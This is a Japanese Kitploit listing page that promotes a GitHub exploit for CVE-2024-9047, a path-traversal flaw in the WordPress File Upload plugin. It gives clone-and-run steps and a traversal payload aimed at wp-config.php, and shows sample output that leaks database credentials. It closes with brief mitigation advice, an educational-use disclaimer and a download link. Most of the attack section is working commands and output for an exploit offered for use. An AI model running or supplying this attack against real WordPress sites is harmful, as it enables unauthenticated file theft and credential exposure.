Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-9047-Exploit — WordPress File Upload Plugin 用エクスプロイト - 4.24.11 までの全バージョンに脆弱性があります。 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-9047-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubnxploited/cve-2024-9047-exploit

CVE-2024-9047-Exploit

WordPress File Upload Plugin 用エクスプロイト - 4.24.11 までの全バージョンに脆弱性があります。

リポジトリを見る
411年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-9047: WordPress File Upload プラグイン用エクスプロイト

説明

WordPress 用の WordPress File Upload プラグインは、wfu_file_downloader.php ファイルを介して、バージョン 4.24.11 以前の全バージョンにおいて パストラバーサル (Path Traversal) の脆弱性の影響を受けます。この脆弱性により、認証されていない攻撃者が意図されたディレクトリの外部にあるファイルを読み取ったり削除したりできます。悪用を成功させるには、対象の WordPress インストールが PHP 7.4 以前 で実行されている必要があります。

影響

  • 重大度: 緊急
  • CVSS スコア: 9.8 (緊急)
  • 攻撃経路: ネットワーク
  • 認証の必要性: なし

悪用

攻撃者は、脆弱なエンドポイント wfu_file_downloader.php に対して特別に細工したリクエストを送信し、ファイルパスパラメータを操作することで、サーバー上の機密ファイルへの不正アクセスを取得できます。


エクスプロイトの詳細

要件

  • 対象の WordPress インストールに脆弱なプラグイン(4.24.11 以前)がインストールされている必要があります。
  • サーバーは PHP バージョン 7.4 以前で実行されている必要があります。

悪用手順

  1. このリポジトリをクローンします:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
    cd CVE-2024-9047-Exploit
    
  2. Python の依存関係をインストールします(必要な場合):

    root@kitploit:~
    pip install requests
    
  3. スクリプトを実行してプラグインのバージョンを確認し、脆弱性を悪用します:

    root@kitploit:~
    python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
    

使用例

デフォルトの脆弱な設定を悪用して WordPress の設定ファイルを読み取るには:

root@kitploit:~
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php

実行結果

root@kitploit:~
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', '' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+


緩和策

WordPress サイトを保護するには:

  1. WordPress File Upload プラグインを最新バージョンに更新します。
  2. PHP バージョンをサポートされているバージョン(7.4 より新しいもの)に更新します。
  3. 機密ファイルへの不正アクセスを防ぐため、ファイルの権限を制限します。
  4. Web アプリケーションファイアウォール (WAF) を使用して悪意のあるリクエストをブロックします。

免責事項

このコードは教育および研究目的のみを意図しています。所有していない、またはテストする明示的な許可がないシステムでこのスクリプトを不正に使用することは、違法かつ非倫理的です。著者らは、このコードの誤用について一切の責任を負いません。

ツールをダウンロード